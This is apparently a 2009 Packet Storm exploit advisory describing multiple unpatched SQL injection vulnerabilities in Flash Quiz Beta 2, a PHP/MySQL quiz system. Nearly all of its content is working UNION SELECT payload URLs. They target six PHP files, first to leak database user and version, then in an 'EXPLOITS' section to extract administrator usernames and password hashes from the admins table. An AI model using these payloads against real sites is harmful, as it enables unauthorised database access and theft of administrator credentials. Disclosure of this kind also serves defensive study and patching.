Flash Quiz Beta 2 SQL Injection

2009-05-22T00:00:00
ID PACKETSTORM:77732
Type packetstorm
Reporter YEnH4ckEr
Modified 2009-05-22T00:00:00

Description

                                        
                                            `--------------------------------------------------------------  
MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2-->  
--------------------------------------------------------------  
  
CMS INFORMATION:  
  
-->WEB: http://sourceforge.net/projects/flashquiz/  
-->DOWNLOAD: http://sourceforge.net/projects/flashquiz/  
-->DEMO: N/A  
-->CATEGORY: CMS / Testing  
-->DESCRIPTION: A Flash quiz system with a PHP/MYSQL back end supporting multiple  
quizzes per instance, result tracking, and high score tracking.  
-->RELEASED: 2009-04-13  
  
CMS VULNERABILITY:  
  
-->TESTED ON: firefox 3  
-->DORK: N/A  
-->CATEGORY: SQL INJECTION  
-->AFFECT VERSION: Beta 2 (maybe <= ?)  
-->Discovered Bug date: 2009-05-20  
-->Reported Bug date: 2009-05-20  
-->Fixed bug date: Not fixed  
-->Info patch: Not fixed  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.  
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)  
  
  
  
#########################  
////////////////////////  
  
SQL INJECTION (SQLi):  
  
////////////////////////  
#########################  
  
  
<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>  
  
  
-------  
INTRO:  
-------  
  
  
This system is completely vulnerable to sql injection.  
  
  
-------------------  
PROOFS OF CONCEPT:  
-------------------  
  
  
[++] GET var --> 'quiz'  
  
[++] File vuln --> 'num_questions.php'  
  
  
~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*  
  
  
[++] GET var --> 'quiz' and 'order_number'  
  
[++] File vuln --> 'answers.php'  
  
  
~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*  
  
~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*  
  
  
[++] GET var --> 'quiz'  
  
[++] File vuln --> 'high_score.php'  
  
  
~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/*  
  
  
[++] GET var --> 'quiz'  
  
[++] File vuln --> 'high_score_web.php'  
  
  
~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/*  
  
  
[++] GET var --> 'quiz'  
  
[++] File vuln --> 'results_table_web.php'  
  
  
~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+version(),user(),concat(user(),0x3A3A3A,version()),database(),current_user(),6,database()/*  
  
  
[++] GET var --> 'quiz' and 'order_number'  
  
[++] File vuln --> 'question.php'  
  
  
~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*  
  
~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*  
  
  
[++[Return]++] ~~~~~> user, version and database in DB.  
  
  
----------  
EXPLOITS:  
----------  
  
  
~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*  
  
~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*  
  
  
[++[Return]++] ~~~~~> username:::password_hash in 'admins' table  
  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  
`